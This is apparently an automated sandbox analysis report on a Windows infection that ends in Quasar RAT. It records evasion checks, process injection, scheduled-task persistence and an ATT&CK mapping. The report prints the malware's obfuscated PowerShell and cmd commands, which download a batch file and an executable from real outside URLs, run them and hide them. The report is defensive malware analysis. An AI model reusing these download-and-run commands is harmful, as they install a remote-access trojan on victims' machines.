          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM_3
          Source: Yara match File source: 0000001F.00000002.2281214797.0000000002131000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000018.00000002.2214696760.0000000002B4B000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000025.00000002.2383386591.0000000002191000.00000004.00000001.sdmp, type: MEMORY
          Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_BaseBoard
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_BIOS
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_000007FF00280EFC sldt word ptr [eax]
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\sp.exe Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\sp.exe Window / User API: threadDelayed 3171
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Window / User API: threadDelayed 9387
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2932 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2396 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2964 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2976 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3036 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2364 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Roaming\sp.exe TID: 2112 Thread sleep time: -31500s >= -30000s
          Source: C:\Users\user\AppData\Roaming\sp.exe TID: 1108 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Roaming\sp.exe TID: 2312 Thread sleep count: 43 > 30
          Source: C:\Users\user\AppData\Roaming\sp.exe TID: 2312 Thread sleep time: -430000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\sp.exe TID: 1072 Thread sleep count: 3171 > 30
          Source: C:\Users\user\AppData\Roaming\sp.exe TID: 1072 Thread sleep time: -31710s >= -30000s
          Source: C:\Users\user\AppData\Roaming\sp.exe TID: 2900 Thread sleep time: -30000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\sp.exe TID: 2860 Thread sleep time: -6456360425798339s >= -30000s
          Source: C:\Users\user\AppData\Roaming\sp.exe TID: 2948 Thread sleep count: 254 > 30
          Source: C:\Users\user\AppData\Roaming\sp.exe TID: 1872 Thread sleep time: -60000s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe TID: 1316 Thread sleep time: -31500s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe TID: 3068 Thread sleep time: -60000s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe TID: 820 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe TID: 3028 Thread sleep time: -420000s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe TID: 2172 Thread sleep time: -11990383647911201s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe TID: 2172 Thread sleep time: -180000s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe TID: 912 Thread sleep count: 9387 > 30
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe TID: 912 Thread sleep count: 249 > 30
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe TID: 648 Thread sleep time: -31500s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe TID: 2040 Thread sleep time: -60000s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe TID: 2128 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Roaming\sp.exe Last function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\sp.exe Thread sleep count: Count: 3171 delay: -10
          Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_00426F7A GetFullPathNameW,FindFirstFileExW,GetLastError,
          Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_005C7F30 FindFirstFileW,GetLastError,
          Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_0044A238 __EH_prolog,new,GetModuleHandleA,GetProcAddress,GetSystemInfo,GetProductInfo,
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
          Source: powershell.exe, 00000010.00000002.2152365583.000000000038E000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

          Anti Debugging:

          Contains functionality to hide a thread from the debugger
          Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_00478772 NtSetInformationThread ?,00000011,00000000,00000000,?,?,00000000,00000000
          Hides threads from debuggers
          Source: C:\Users\user\AppData\Roaming\sp.exe Thread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_0058E501 IsDebuggerPresent,OutputDebugStringW,
          Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_004F2AA7 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,
          Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_0069B53C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_004AABEB GetProcessHeap,HeapFree,
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\sp.exe Process token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_006814DA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_0068B781 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Roaming\sp.exe Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          .NET source code references suspicious native API functions
          Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, ???uf871???????????ufffd??ufffd?.cs Reference to suspicious API methods: ('????????????????????', 'LoadLibrary@kernel32.dll'), ('????????????????????', 'GetProcAddress@kernel32.dll')
          Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, ???ua8fa?uf866???ufffd???u323bu1377???u24a3?.cs Reference to suspicious API methods: ('????????????????????', 'MapVirtualKeyEx@user32.dll')
          Injects a PE file into a foreign processes
          Source: C:\Users\user\AppData\Roaming\sp.exe Memory written: C:\Users\user\AppData\Roaming\sp.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Memory written: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Memory written: unknown base: 400000 value starts with: 4D5A
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat')
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mode.com mode 18,1
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;'
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\sp.exe 'C:\Users\user\AppData\Roaming\sp.exe'
          Source: C:\Users\user\AppData\Roaming\sp.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gUuYfpYBjYgU' /XML 'C:\Users\user\AppData\Local\Temp\tmpCF32.tmp'
          Source: C:\Users\user\AppData\Roaming\sp.exe Process created: C:\Users\user\AppData\Roaming\sp.exe {path}
          Source: C:\Users\user\AppData\Roaming\sp.exe Process created: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe 'C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe'
          Source: C:\Users\user\AppData\Roaming\sp.exe Process created: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe 'C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe'
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JrekdQ' /XML 'C:\Users\user\AppData\Local\Temp\tmp4F59.tmp'
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process created: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe {path}
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JrekdQ' /XML 'C:\Users\user\AppData\Local\Temp\tmpC70.tmp'
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process created: unknown unknown

          Language, Device and Operating System Detection:

Yara detected Obfuscated Powershell
Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: C:\Users\user\Documents\pd.bat, type: DROPPED
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 28_2_0040EA7D cpuid
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: GetLocaleInfoW,
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: ___crtGetLocaleInfoEx,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 28_2_006A23D1 GetSystemTimeAsFileTime,
Source: C:\Users\user\AppData\Roaming\sp.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

Yara detected Quasar RAT
Source: Yara match | File source: 00000023.00000002.2389281983.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000025.00000002.2384182418.0000000003CC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.2282183645.0000000003C60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Directory queried: C:\Users\user\Documents
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Directory queried: C:\Users\user\Documents
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Directory queried: C:\Users\user\Documents
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Directory queried: C:\Users\user\Documents
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Directory queried: C:\Users\user\Documents
Source: C:\Windows\System32\attrib.exe | Directory queried: C:\Users\user\Documents
Source: C:\Windows\System32\attrib.exe | Directory queried: C:\Users\user\Documents
Source: C:\Windows\System32\cmd.exe | Directory queried: C:\Users\user\Documents
Source: C:\Windows\System32\cmd.exe | Directory queried: C:\Users\user\Documents

          Remote Access Functionality:

Yara detected Quasar RAT
Source: Yara match | File source: 00000023.00000002.2389281983.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000025.00000002.2384182418.0000000003CC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.2282183645.0000000003C60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation 111 | DLL Side-Loading 1 | DLL Side-Loading 1 | Disable or Modify Tools 11 | Input Capture 111 | System Time Discovery 1 | Remote Services | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 13 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scripting 311 | Scheduled Task/Job 1 | Access Token Manipulation 1 | Deobfuscate/Decode Files or Information 11 | LSASS Memory | File and Directory Discovery 13 | Remote Desktop Protocol | Data from Local System 1 | Exfiltration Over Bluetooth | Encrypted Channel 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Native API 11 | Logon Script (Windows) | Process Injection 111 | Scripting 311 | Security Account Manager | System Information Discovery 136 | SMB/Windows Admin Shares | Input Capture 111 | Automated Exfiltration | Non-Standard Port 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | Exploitation for Client Execution 13 | Logon Script (Mac) | Scheduled Task/Job 1 | Obfuscated Files or Information 41 | NTDS | Query Registry 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol 2 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Command and Scripting Interpreter 13 | Network Logon Script | Network Logon Script | Software Packing 32 | LSA Secrets | Security Software Discovery 431 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol 23 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Scheduled Task/Job 1 | Rc.common | Rc.common | DLL Side-Loading 1 | Cached Domain Credentials | Virtualization/Sandbox Evasion 15 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | PowerShell 2 | Startup Items | Startup Items | Masquerading 1 | DCSync | Process Discovery 2 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion 15 | Proc Filesystem | Application Window Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Access Token Manipulation 1 | /etc/passwd and /etc/shadow | Remote System Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
